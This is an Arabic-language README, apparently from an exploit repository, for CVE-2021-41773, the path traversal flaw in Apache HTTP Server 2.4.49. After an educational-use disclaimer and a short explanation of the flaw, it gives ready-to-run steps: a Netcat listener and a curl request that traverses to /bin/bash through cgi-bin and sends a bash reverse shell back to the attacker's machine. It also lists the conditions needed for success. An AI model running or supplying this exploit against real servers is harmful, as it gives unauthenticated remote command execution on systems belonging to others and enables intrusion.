
⚠️ إخلاء مسؤولية
هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.
يمكن استخدام المعلومات والكود المقدم هنا في بيئات خاضعة للتحكم، مثل أجهزة المختبرات الخاصة.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.
CVE-2021-41773 تؤثر على خادم Apache HTTP Server الإصدار 2.4.49.
بسبب التحقق غير الصحيح من المدخلات في عملية تطبيع المسارات، يمكن للمهاجم استغلال ثغرة اجتياز المسار باستخدام أحرف مشفرة مثل %2e للوصول إلى ملفات عشوائية.
إذا كان CGI مفعّلاً، يمكن تصعيد هذه الثغرة إلى تنفيذ أوامر عن بُعد بدون مصادقة (RCE).
يتم إنشاء طلب curl خبيث لاستغلال ثغرة اجتياز المسار. عندما يكون CGI مفعّلاً، يمكن للمهاجمين الوصول إلى /bin/bash وتنفيذ أوامر شل عشوائية.
في هذا المثال، يتم إرسال حمولة شل عكسية للحصول على وصول شل من الخادم.
تم اختبار هذا الاستغلال في بيئة مختبر خاصة. فيما يلي الخطوات والنتائج.
حدد فحص Nmap الهدف الذي يعمل بنظام Apache/2.4.49.

تم إرسال حمولة شل عكسية باستخدام أمر curl مُعد خصيصًا.

تم الحصول على شل عكسي بنجاح على جهاز المستمع الخاص بالمهاجم.

الخطوة 1: تشغيل مستمع Netcat
nc -nvlp 4444
الخطوة 1: تشغيل الاستغلال
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
أن إصدار Apache هو 2.4.49
أن CGI مفعّل
أن المنفذ 4444 (أو المنفذ الذي اخترته) مفتوح عبر جدار الحماية
اطّلع على الشرح التفصيلي والنظرية في مقالتي على Medium:
👉 اقرأ المدونة على Medium